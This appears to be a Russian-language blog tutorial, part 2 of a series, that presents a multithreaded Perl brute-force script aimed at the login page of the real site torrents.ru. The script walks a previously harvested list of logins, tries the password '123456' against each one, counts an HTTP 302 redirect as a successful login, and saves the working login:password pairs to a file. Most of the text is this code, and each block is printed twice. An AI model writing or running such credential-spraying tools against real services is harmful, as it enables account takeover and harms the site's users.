Парсер+брутфорс (часть №2)

Теперь напишем брутфорс (исходники одним файлом в конце статьи). Запрос авторизации и какие переменные в него входят были рассмотренны в предыдущей части. Если с помощью сниффера сравнить пакеты сервера при удачной и неудачной авторизации, то можно заметить, что сервер возвращает 302 редирект при удачной авторизации, от этого и будем отталкиваться.

Подключим базовые компоненты

use warnings;
use LWP::UserAgent;
use threads;
use threads::shared;
use Fcntl ':flock';  #Данный компонент нужен для блокировки файла, чтобы не возникало конфликтов между потоками

use warnings;

use LWP::UserAgent;

use threads;

use threads::shared;

use Fcntl ':flock'; #Данный компонент нужен для блокировки файла, чтобы не возникало конфликтов между потоками

Объявим переменные

$threads =  10			; #Кол-во потоков
$pwd	 = '123456'    	; #Пароль на который будут проверяться аккаунты
$fname   = 'good.txt'   ; #Файл куда будут записываться валидные аккаунты
$ml      = 'base.txt'	; #Список мыл

my $i : shared;			#Вспомогательная переменная для подсчета % завершенности перебора
$| =1; #Очистка буфера вывода

$threads = 10 ; #Кол-во потоков

$pwd = '123456' ; #Пароль на который будут проверяться аккаунты

$fname = 'good.txt' ; #Файл куда будут записываться валидные аккаунты

$ml = 'base.txt' ; #Список мыл

my $i : shared; #Вспомогательная переменная для подсчета % завершенности перебора

$| =1; #Очистка буфера вывода

Запишем собранную ранее базу в массив

open (ACS, "<$ml") || die("Could not open login list file!");
my @acc : shared = <ACS> ;
chomp(@acc);  #Убирает символ перевода строки у всех элементов массива
close(ACS);

$size = scalar @acc;  #Переменная хранящая размер массива с логинами (нужна для вывода статистики)

open (ACS, "<$ml") || die("Could not open login list file!");

my @acc : shared = <ACS> ;

chomp(@acc); #Убирает символ перевода строки у всех элементов массива

close(ACS);

$size = scalar @acc; #Переменная хранящая размер массива с логинами (нужна для вывода статистики)

Старт потоков

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

1 2	for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; }

Функция перебора

sub Brut
{
my $ua = LWP::UserAgent->new; #Создаем компонент браузера
$ua->agent("Mozilla/4.0");   #Задаем значение переменной UserAgent для браузера(зачастую необязательно)

while(@acc)  #Цикл перебора с выходом при опустощении массива с логинами
{
my $login ='';
{lock(@acc); $login = shift @acc;}

my $answ = $ua->post('http://torrents.ru/forum/login.php', {'login_username' => $login, 'login_password' => $pwd, login => 'Вход'})->code;  #Записываем в переменную $answ код ответа сервера на попытку авторизации

if($answ == 302)  #Сравнение ответа с нужным нам результатом
{
print "[+] $login\n"; #Вывод валидного логина на экран
open(FILE, ">>$fname") || die("Could not open $fname\n"); #Открытие файла на дозапись
flock(FILE, LOCK_EX);  #Блокировка файла для данного потока
print FILE "$login:$pwd\n"; #Запись валидной пары логин:пароль в файл
flock(FILE, LOCK_UN);  #Разблокировка файла
close(FILE);  #Закрытие файла
}
{lock($i);$i++;} #Инкремент общей переменной для подсчета % перебранных логинов
print "< ".sprintf("%.2f", ($i/$size)*100)."% >\r"; #Вывод % перебранных логинов
}

}

sub Brut

{

my $ua = LWP::UserAgent->new; #Создаем компонент браузера

$ua->agent("Mozilla/4.0"); #Задаем значение переменной UserAgent для браузера(зачастую необязательно)

while(@acc) #Цикл перебора с выходом при опустощении массива с логинами

{

my $login ='';

{lock(@acc); $login = shift @acc;}

my $answ = $ua->post('http://torrents.ru/forum/login.php', {'login_username' => $login, 'login_password' => $pwd, login => 'Вход'})->code; #Записываем в переменную $answ код ответа сервера на попытку авторизации

if($answ == 302) #Сравнение ответа с нужным нам результатом

{

print "[+] $login\n"; #Вывод валидного логина на экран

open(FILE, ">>$fname") || die("Could not open $fname\n"); #Открытие файла на дозапись

flock(FILE, LOCK_EX); #Блокировка файла для данного потока

print FILE "$login:$pwd\n"; #Запись валидной пары логин:пароль в файл

flock(FILE, LOCK_UN); #Разблокировка файла

close(FILE); #Закрытие файла

}

{lock($i);$i++;} #Инкремент общей переменной для подсчета % перебранных логинов

print "< ".sprintf("%.2f", ($i/$size)*100)."% >\r"; #Вывод % перебранных логинов

}

Функция sprintf задает точность вывода результата ($i/$size)*100, в данном случае точность составляет 2 знака после запятой. Знак переноса \r в комбинации с $| =1; позволяет выводить % постоянно на одной и той же строке, при этом подобранные логины пишутся каждый раз с новой строки.

Исходный код одним файлом: скачать

Парсер+брутфорс (часть №2): 23 комментария

пиздец, ну и код

Парсер+брутфорс (часть №2): 23 комментария

Добавить комментарий Отменить ответ